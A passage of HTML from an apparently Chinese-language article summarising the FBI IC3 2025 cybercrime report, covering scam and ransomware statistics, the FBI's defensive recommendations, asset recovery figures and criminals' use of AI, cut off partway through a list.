rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2. 典型诈骗手法</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">账户接管：约 4,700 起，损失 3.597 亿美元</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">黄金快递诈骗：约 725 件投诉，损失 3.118 亿美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投资俱乐部诈骗：约 1,600 件投诉，损失 1.6 亿美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">冒充政府官员诈骗：约 32,000 件投诉，损失 7.98 亿美元。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021050" data-ratio="0.7811158798283262" width="497" data-type="png" data-w="932" height="388" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=edd36439&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCK1fv4Su0WydseIaD6eSNLbfNc27HGnhgWHYolYmia6DEArCMhXrattHojicZGM1x6amT6kdlicPYse85TTOgIvrrLDpIWiagdL8eg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">3. 网络威胁</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2025 年向 IC3 申报的网络威胁类型包括：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数据泄露：占比 39%，为数量最多的类型。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">勒索软件：占比 36%，位居第二。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SIM卡置换：占比 10%。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意软件：占比 9%。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">僵尸网络：占比 7%</span>。</span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6204379562043796" data-type="png" data-w="822" height="270" style="margin-left: 0px;margin-top: 0px;" width="437" data-imgfileid="100021048" src="https://wechat2rss.xlab.app/img-proxy/?k=29153c02&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKvTuDGBl4HJaAEBej8Wp64y0iaDZiaicqZBRic3UAuNKq0GKtdhXOI5ibLMsNhDPy5jQnVR4IcpeG5v8uVs7m9ibvAvtjMlibXfdkurg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">其中，3600 起勒索软件投诉造成超过 3200 万美元损失。主要勒索软件变种包括 Akira、Qilin、 INC./Lynx/Sinobi、BianLian、Play、Ransomhub、Lockbit、Dragonforce、SAFEPA、Medusa。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021053" data-ratio="1.212058212058212" width="431" data-type="png" data-w="962" height="520" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2d2acfc2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKDLf6J646T8ic11AzIGCXwGILzPOQcoQibg66xYCkoT9wjCibvHGUGC3eB1Jr1Htxf0RictmUbILzF23Xic7pUNlUYLkUvrZH95R2I%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">针对勒索软件攻击频发的形势，FBI 建议企业和组织采取以下关键防护措施：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">创建异地或离线备份，并定期维护备份与恢复机制；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在安装软件时清除默认密码和凭据；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">默认禁用并移除不必要的协议；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">尽可能为所有服务启用多因素认证(MFA)；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">保护初始入侵入口；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">实施网络分段以阻止勒索软件扩散；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">及时更新所有操作系统、软件和固件。</span></span></p></li></ul><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">4. 资产追回成果</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2025 年， FBI RAT 通过 FFKC 共拦截 3,900 起案例，冻结资金 6.79 亿美元， 资金拦截成功率为 58%。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">“升级行动”(Operation Level Up) 累计发出预警的受害者超过 8,000 名，并为这些受害者挽回了超过 5 亿美元的潜在损失。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">与印度执法部门合作，打击呼叫中心诈骗，通过 27 次联合行动实现了 475 多次逮捕。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在金融欺诈项目中，成功冻结并追回多笔大额资金。</span></span></p></li></ul><h1 dir="ltr" style="line-height:1.38;margin-top:20pt;margin-bottom:6pt;"><span style="white-space:pre-wrap;font-size:20pt;font-family:Roboto,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-size: 24px;">关键点五：人工智能(AI) 在网络犯罪中的应用</span></span></span></h1><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">1. 整体情况</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2025 年，IC3 共收到超过 2.2 万起涉及 AI 相关信息的投诉。这些投诉所造成的损失总额超过 8.93 亿美元。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021051" data-ratio="0.5648535564853556" width="382" data-type="png" data-w="956" height="215" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=55090001&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKY3XO8Wa2IAG9k2gPKOBD99ticeXDcaA5ibL9BY1r8EqibicnmyzBBz47zzG4ibZ5cLKKzhSTvficR0QHTibTzGOia5UyHEI5uqI2msKI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2. 从投诉数量来看</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投资诈骗：4,356 起。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">敲诈勒索：1,764 起。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">个人数据泄露：1,204 起。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">网络钓鱼/冒充诈骗：803 起。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">骚扰/跟踪：763 起。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021052" data-ratio="0.9418103448275862" width="345" data-type="png" data-w="928" height="328" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=c805ba8a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIteJ9YjVMQuiaXb0M3al42p5CCBdIeToO3At2EGcoYsZEialTc2vqicbjPT2lOtWib47ch52Q8y1ibtDyMT1aElGyqNw9Vhp0ZcKYw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">3. 从损失金额来看</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投资诈骗：约 63,204 万美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">商业邮件诈骗(BEC)：约  3,026 万美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">技术支持 / 客服诈骗：约 1,946 万美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">情感/信任诈骗：约 1,904 万美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">个人数据泄露：约 1,877  万美元。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021054" data-ratio="0.9506437768240343" width="424" data-type="png" data-w="932" height="403" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=66693938&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIcPLGCQv5jnL5laR5zE5cYWRz41UniaUyIibecCgeBKXLBpUWa9NcSz8zxvOfIGkx6icBPqIlEVHQl7SrQLQ2tsbLUOZHersCIMo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">4. AI 在典型诈骗场景中的具体应用方式</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从报告来看，AI 已被广泛应用于以下典型诈骗场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">商业邮件诈骗(BEC)：利用 AI 生成仿冒高管语气的邮件或通过语音克隆发出转账指令，2025 年相关损失超过 3000 万美元；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">情感/信任诈骗：通过 AI 生成虚假身份与对话脚本，甚至利用语音克隆模拟亲属求助场景，相关损失超过 1900 万美元；</span></span></p></li><li><p 